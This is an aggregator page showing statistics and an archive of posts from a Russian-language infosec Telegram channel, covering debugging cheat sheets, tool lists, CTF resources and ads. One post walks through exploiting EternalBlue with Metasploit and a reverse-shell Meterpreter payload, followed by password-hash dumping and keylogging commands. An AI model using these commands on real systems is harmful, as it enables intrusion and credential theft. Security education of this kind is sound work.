CodeGuard: PySec Edition
关闭频道
Канал по ИБ и этичному хакингу. Автор: @Arakcheev_Ruslan Ссылка: @invite_CodeGuard Рекламный менеджер: @Diggsale Биржа: https://telega.in/c/+3X56uL4A-UM3Njgy
显示更多📈 Telegram 频道 CodeGuard: PySec Edition 的分析概览
频道 CodeGuard: PySec Edition 是活跃参与者。目前社区聚集了 14 005 名订阅者,在 技术与应用 类别中位列第 8 813,并在 俄罗斯 地区排名第 46 176 位。
📊 受众指标与增长动态
自 невідомо 创建以来,项目保持高速增长,吸引了 14 005 名订阅者。
根据 21 九月, 2026 的最新数据,频道保持稳定运转。过去 30 天订阅人数变化为 681,过去 24 小时变化为 92,整体触达仍然可观。
- 认证状态: 未认证
- 互动率 (ER): 平均受众互动率为 10.50%。内容发布后 24 小时内通常能获得 5.72% 的反应,占订阅者总量。
- 帖子覆盖: 每篇帖子平均可获得 1 467 次浏览,首日通常累积 799 次浏览。
- 互动与反馈: 受众积极参与,单帖平均反应数为 7。
- 主题关注点: 内容集中在 codeguard, pysec, docker, grep, контейнер 等核心主题上。
📝 描述与内容策略
作者将该频道定位为表达主观观点的平台:
“Канал по ИБ и этичному хакингу.
Автор: @Arakcheev_Ruslan
Ссылка: @invite_CodeGuard
Рекламный менеджер: @Diggsale
Биржа: https://telega.in/c/+3X56uL4A-UM3Njgy”
凭借高频更新(最新数据采集于 22 九月, 2026),频道始终保持新鲜度与高覆盖。分析显示受众积极互动,使其成为 技术与应用 类别中的关键影响点。
14 005
订阅者
+9224 小时
+2127 天
+68130 天
帖子存档
14 005
Пропустили Claud Mythos?
Если вы обнаружили, что пропустили самую сильную модель, когда доступ к ней уже закрыли, — этот пост для вас.
Модель пробыла открытой всего 3 дня, пока в пятницу её экстренно не отключили. Я проверил ее на нескольких задачах:
✅написание пет-проекта с нуля ✅генерация текстов ✅агентский режимБольше всего впечатлила работа агента. Я скинул ссылки на каналы по IT и AI, которые накопились у меня в разных папках, и попросил проанализировать их контент за последний месяц. Задача была простой: выкинуть «каналы-пустышки», которые просто копируют друг у друга новости, и оставить только авторов с прикладным опытом. Claude оставил экспертов, которые делятся практикой внедрения ИИ, вайб-кодингом, нейрогеренерацией и автоматизацией. Итоговый список я объединил в одну подборку. Советую подписаться на авторов, уверен, каждый найдет для себя подходящие каналы. Подписка в 1 клик: https://t.me/addlist/cAgkZ6iNxgJlYzky
14 005
🐙 awesome-infosec — главный навигатор по ИБ-образованию
Не знаете, с чего начать изучение кибербезопасности? Вот всё в одном месте.
🔗 GitHub ⭐️ 1k+
Что внутри:
🔵MOOC курсы — от Stanford до Университета Мэриленда 🔵Академические программы — NYU Tandon, FSU Offensive Security 🔵Open Security Training — форензика, реверс-инжиниринг, ARM 🔵Сертификации — бесплатные материалы по CISSP, Security+, CEH 🔵Практика — CTF, лаборатории, челленджиДля кого: От новичков до профессионалов, которые хотят систематизировать знания. Сохраняйте — заменит сотню закладок. 😈 CodeGuard: PySec Edition | Чат
14 005
🔬 strace — шпионим за системными вызовами
1. Просмотр системных вызовов программы:
strace ./program2. Фильтр по вызовам, связанным с сетью (чтение и запись через сокет):
strace -e trace=network ./program
3. Запись вызовов в файл:
strace -o strace.log ./program
4. Подсоединиться к уже работающему процессу (PID = 1234)
strace -p 12345. Узнать, какие файлы открывает процесс:
strace -e trace=open,openat,close ./program6. Сравнить нормальный запуск и подозрительный (например, если программа лезет куда-то не туда):
strace -f -e trace=execve ./program
7. Маскарад (скрыть путь к программе для тестов):
(Просто переименуйте бинарник или используйте exec -a — чит для CTF, но не более)
8. Найти причину падения (ошибка = -1, например, нет прав на открытие файла):
strace -e trace=file ./program 2>&1 | grep -E "= -1"
Когда используется: Ревёрс-инжиниринг, малвар-анализ, отладка без исходников.
Важно: strace для легковесного анализа; для глубокого реверса используйте ltrace (отслеживает вызовы библиотечных функций).
😈 CodeGuard: PySec Edition | Чат14 005
🛡 Skanda — OSINT-фреймворк для расследования кибератак
Автоматический анализ угроз, связей индикаторов и их атрибуции (похоже на машинку, которая делает работу тимлида).
🔗 GitHub
Что внутри:
🔵Сбор IOC (IP, домены, хеши) из открытых источников 🔵Обогащение (VirusTotal, AlienVault OTX, AbuseIPDB) 🔵Визуализация связей между атаками 🔵Экспорт отчётов (PDF, HTML)Особенности:
🔵Работает в Docker (легко развернуть) 🔵Есть веб-интерфейс для загрузки логов 🔵Поддерживает MITRE ATT&CK таксоныЗапуск:
git clone https://github.com/OWASP/Skanda
cd Skanda
docker-compose up -d
😈 CodeGuard: PySec Edition | Чат14 005
🔓 Взлом Windows Hello — обход через USB-токен
Microsoft обещала "надёжную биометрию". Эксплуатация поддельного токена обходит PIN, лицо и отпечатки пальцев.
🔗 Ссылка
Что показывают:
🔵Windows доверяет любому токену FIDO2, который представляется "аппаратным ключом" 🔵Поддельный токен за несколько минут программно эмулируется на Arduino 🔵Атака сработает, даже если Windows Hello вообще не настроен!Для кого: Админы и безопасники крупных компаний (где включена аутентификация через токены) 😈 CodeGuard: PySec Edition | Чат
14 005
Одна точка входа может изменить все.
Злоумышленники давно не ищут просто уязвимости. Они ищут возможности. Проверяют, можно ли использовать открытый сервис, подобрать пароль к логин-форме, получить доступ через подрядчика или развить атаку через забытый ресурс.
Решение ASM TRY от F6 проверит все то же самое — в безопасной среде, с гибкой настройкой параметров и расписания проверок, используя методы атакующих.
В материале разбираем, как активное сканирование помогает проверять инфраструктуру методами, приближенными к действиям реального атакующего:
▪️ 4 категории проверки: брутфорс, фаззинг, сканирование портов и эксплойт-тестирование;
▪️ как ИБ-команды могут проверять собственные гипотезы атак;
▪️ чем активное сканирование отличается от VM, BAS и пентестов;
▪️ реальные кейсы поиска точек входа.
➡️ Узнайте как безопасно проверить компанию и поддерживать процессы, связанные с требованиями регуляторов в материале
#реклама
О рекламодателе
14 005
📑 Статья: «PyCharm 2026.1: что нового в главной Python IDE»
JetBrains выпустила масштабное обновление PyCharm. Версия 2026.1 вышла в апреле и принесла изменения, которые действительно меняют работу.
Главные новинки 2026.1:
🟡Новый отладчик на debugpy — PyCharm перешёл на стандартный debugpy (вместо устаревшего pydevd). Полная поддержка PEP 669, меньше оверхэда, работает с asyncio, FastAPI и aiohttp «из коробки» . 🟡AI-интеграция — ACP Registry: каталог AI-кодинг-агентов (OpenCode, Gemini CLI) с установкой в пару кликов. OpenAI Codex теперь встроен в чат, плюс BYOK — подключайте свои API-ключи от OpenAI, Anthropic или локальные модели . И главное — next edit suggestions (NES): AI предсказывает следующее изменение в коде, переключайтесь по Tab, никакого копирования промтов. Не тратит AI-кредитыЧто ещё:
· JavaScript, TypeScript, React и CSS — теперь в базовой бесплатной версии (раньше требовали Pro) · Поддержка NPM-скриптов, ESLint, Prettier · Проверка зависимостей на уязвимости👉 Ссылка 😈 CodeGuard: PySec Edition | Чат
14 005
На Stepik вышла программа «Фундамент DevOps»
Это комплексная программа из 4 практических курсов по ключевым технологиям современного DevOps: Linux, Git, Docker и Kubernetes.
Вы последовательно пройдёте путь от работы в Linux и Git до контейнеризации приложений и управления ими в Kubernetes.
Что вы изучите:
• уверенную работу в Linux и терминале • Git и контроль версий в реальных проектах • Docker и контейнеризацию приложений • Kubernetes и оркестрацию контейнеров • основы сетей, безопасности и хранения данных • автоматизацию задач и диагностику инфраструктуры ... и многому другомуВсе знания закрепляются на практике с помощью заданий с автопроверкой. Материал подаётся понятным языком, шаг за шагом, с большим количеством примеров, схем и демонстраций. После прохождения вы получите сертификат, который можно добавить в резюме. Отдельно курсы стоят 16 600 ₽, но в составе программы доступны всего за 7 990 ₽: открыть на Stepik
14 005
📺 Лучшие YouTube-каналы по кибербезопасности (для новичков)
Для старта и общей базы: 🟡NetworkChuck — весёлые вводные уроки по всему подряд. 🟡David Bombal — фундаментальные вещи, Wireshark, CTF. 🟡Hak5 — железо, скрипты, обзоры инструментов. Углубляемся в пентест: 🔵IppSec — детальный разбор машин Hack The Box. Маст хэв для OSCP. 🔵HackerSploit — кибербезопасность в действии, от веба до Active Directory. 🔵The XSS Rat — баг-хантер шоу с живыми атаками. Анализ вредоносного ПО и реверс: 🔵John Hammond — ломает малварь и объясняет на пальцах. 🔵LiveOverflow — глубинный реверс-инжиниринг и взлом бинарников.Идеально, чтобы учиться бесплатно. Просто включите и делайте 😈 CodeGuard: PySec Edition | Чат
14 005
📑 Статья: «PyCharm 2026.1: что нового в главной Python IDE»
JetBrains выпустила масштабное обновление PyCharm. Версия 2026.1 вышла в апреле и принесла изменения, которые действительно меняют работу.
Главные новинки 2026.1:
🟡Новый отладчик на debugpy — PyCharm перешёл на стандартный debugpy (вместо устаревшего pydevd). Полная поддержка PEP 669, меньше оверхэда, работает с asyncio, FastAPI и aiohttp «из коробки» . 🟡AI-интеграция — ACP Registry: каталог AI-кодинг-агентов (OpenCode, Gemini CLI) с установкой в пару кликов. OpenAI Codex теперь встроен в чат, плюс BYOK — подключайте свои API-ключи от OpenAI, Anthropic или локальные модели . И главное — next edit suggestions (NES): AI предсказывает следующее изменение в коде, переключайтесь по Tab, никакого копирования промтов. Не тратит AI-кредитыЧто ещё:
· JavaScript, TypeScript, React и CSS — теперь в базовой бесплатной версии (раньше требовали Pro) · Поддержка NPM-скриптов, ESLint, Prettier · Проверка зависимостей на уязвимости👉 Ссылка 😈 CodeGuard: PySec Edition | Чат
14 005
Айтишники ловите сборник бесплатных курсов, полезных инструментов и книг
Проект «TERMINAL» стал крупнейшей библиотекой бесплатного образования. В одном канале собраны курсы, книги, полезные инструменты и практические тренажёры для всех разработчиков
🎓 Практические курсы и задания
🪽 Книги и статьи известных авторов
😮💨 Полезные инструменты и ресурсы
🌟 IT-новости и инсайды
Обучение по всем направлениям: SQL, Python, Frontend, PHP, C++, Golang, GIT, Linux, QA, Java, кибербезопасность и др.
Ценишь знания, подпишись: Terminal_tg
14 005
📄 FOCA — ищем скрытые данные в документах компании
Что это: Инструмент для анализа метаданных документов (DOC, PDF, XLS, PPT).
Что ищет:
🟡Имена авторов и пути к папкам 🟡Скрытые сетевые пути (\server\share) 🟡Email-адреса, версии ПО 🟡Принтеры, замены шрифтов🔧 Сайт (Windows Only) Установка: Скачать
.exe с официального GitHub.
Как защититься: Очищать метаданные перед публикацией документов. Встроенными средствами Office или утилитами.
😈 CodeGuard: PySec Edition | Чат14 005
Эй, ты! 🫵 А ну быстро выключи свой VPN!
• Этот пароль — слишком простой! Взломают!
• Эту ссылку — открывать нельзя! Фишинг!
• Сюда — данные не вводи! Мошенники!
Цифровой мир стремительно меняется, а угрозы конфиденциальности становятся тотальными. Вот только 95% пользователей — беспечны и годами игнорируют базовые правила безопасности, пока не потеряют свои аккаунты.
Лишь малая часть общества вовремя защищает свои данные и читает незаменимый сегодня «Пакет безопасности». Это №1 ресурс в Telegram про цифровую гигиену, кибербезопасность и стабильный доступ в интернет.
Уверяем, с каждым днём канал будет только актуальнее — такова реальность цифровой эпохи, в которой мы живём. Так что лучше подпишись сейчас: @package_security
14 005
🐙 h4cker — 10 000+ ресурсов по этичному хакингу
Тысячи скриптов, чек-листов и обучающих материалов от Омара Сантоса — эксперта с 20+ годами в ИБ
🔗 GitHub ⭐️ 22k+ звёзд
Что внутри:
👉AI Security — защита LLM, тестирование на инъекции, AI Red Teaming 👉Certifications — дорожные карты для OSCP, CISSP, облачных сертификаций 👉Build Your Own Lab — создание домашних полигонов 👉Cybersecurity Domains — фундаментальные знания по всем направлениям 👉Training Reference — шпаргалки, книги, тулзыКак использовать: Склонируйте репозиторий и выбирайте разделы под свои задачи. Сохраняйте — заменит десятки закладок. 😈 CodeGuard: PySec Edition | Чат
14 005
🐞 Шпаргалка по GDB — отладка бинарников из консоли
1. Запуск программы в GDB:
gdb ./program2. Точки останова:
break main # поставить брейк на main break *0x401234 # поставить брейк по адресу info breakpoints # посмотреть все брейки delete 1 # удалить брейк #13. Запуск и выполнение:
run # запустить run arg1 arg2 # с аргументами continue # продолжить после брейка stepi # одна инструкция (шаг внутрь) nexti # одна инструкция (шаг с обходом вызовов)4. Просмотр регистров и памяти:
info registers # все регистры p $eax # значение регистра eax x/10x $rsp # 10 слов памяти по адресу rsp x/s $rdi # строка по адресу rdi5. Анализ после сбоя (core dump):
gdb ./program core bt # backtrace (стек вызовов) frame 2 # перейти во второй фрейм info locals # локальные переменные6. Полезное:
set disassembly-flavor intel # синтаксис Intel вместо AT&T disass main # дизассемблировать функциюСохраняйте🔖 😈 CodeGuard: PySec Edition | Чат
14 005
🏆 CTF Arsenal — 50+ тулзов в браузере для CTF и пентеста
Хватит открывать 20 вкладок. CTF Arsenal собирает всё в одном дашборде.
Что внутри:
🔵15+ тулзов по крипте: base64, хеши, шифры, генераторы паролей 🔵10+ для веба: SQLi пейлоады, XSS, JWT декодер, HTTP анализ 🔵12+ форензика: метаданные, стеганография (LSB), анализ PCAP 🔵8+ реверс-инжиниринг / PWN: ROP гаджеты, шеллкод, BOF паттерны🔗 GitHub ⭐️ новинка 2025 Как запустить (без установки):
ctf-arsenal.replit.app
😈 CodeGuard: PySec Edition | Чат14 005
📡 5 площадок для CTF-соревнований (бесплатно)
1. picoCTF — от университета Карнеги-Меллон. Лучший старт для новичков.
Ссылка
2. CTFtime — агрегатор всех CTF в мире. Календарь, команды, рейтинги.
Ссылка
3. RingZer0 — онлайн-площадка с тысячами задач (SQLi, крипто, форензика).
Ссылка
4. TryHackMe CTF — комнаты с таймером, как на настоящих соревнованиях.
Ссылка
5. HackTheBox CTF — регулярные соревнования на реальных машинах.
Ссылка
🎁 Бонус: Начните с picoCTF — там есть гайды для полных новичков.
😈 CodeGuard: PySec Edition | Чат
14 005
🎯 Metasploit за 5 минут — первый эксплойт
Текст:
1. Запуск:
sudo msfconsole
2. Поиск модуля для EternalBlue (MS17-010):
search ms17-0103. Используем модуль:
use exploit/windows/smb/ms17_010_eternalblue4. Настройка (IP цели и своя слушающая машина):
set RHOSTS 192.168.1.100
set LHOST 192.168.1.50
set PAYLOAD windows/x64/meterpreter/reverse_tcp
5. Атака:
run6. Получили Meterpreter shell:
sysinfo getuid shellПолезные команды внутри Meterpreter:
hashdump — вытащить хеши паролей
screenshot — скриншот экрана жертвы
keyscan_start / keyscan_dump — кейлоггер
upload /file /путь — загрузить файл
⚠️ Только на своих системах или с разрешения.
😈 CodeGuard: PySec Edition | Чат14 005
🥷 Ищем ИБ и OSINT специалистов. Релокейт, удалёнка, платим много!
- Вакансии которых нет на джоб-агрегаторах
- Только прямые контакты HR в Telegram
👉 @jobs_ib
🤖 ML & DS 👩💻 DevOps
👨✈️ ИБ & OSINT 👣 Go
👩💻 Mobile 👩💻 C#
👩💻 Node.js 👩💻 Python
🔎 QA 👩💻 Java
👩💻 UX/UI 👩💻 Frontend
🖼️ PHP 📋 Analyst
💼 1C 🖥 SQL
👩💻 IT HR
Пока другие листают джоб-сайты — ты уже пишешь HR в Telegram.
14 005
⚔️ MITRE ATT&CK Navigator — визуализируй покрытие техник атак
Планируете тест на проникновение или проверяете, насколько SOC готов к реальным атакам?
🔗 Сайт
Что это: Интерактивная тепловая карта всех тактик и техник MITRE ATT&CK
Как использовать:
👉Оцените покрытие вашей защиты (синие команды) 👉Спланируйте, какие техники использовать в Red Team 👉Экспортируйте/импортируйте слой в JSONДля кого: Синих команд (проверить детекцию техник), красных команд (спланировать маршрут атаки), аналитиков угроз. Почему удобно: Можно добавить скоринг, комментарии и цвета для каждой техники. 😈 CodeGuard: PySec Edition | Чат
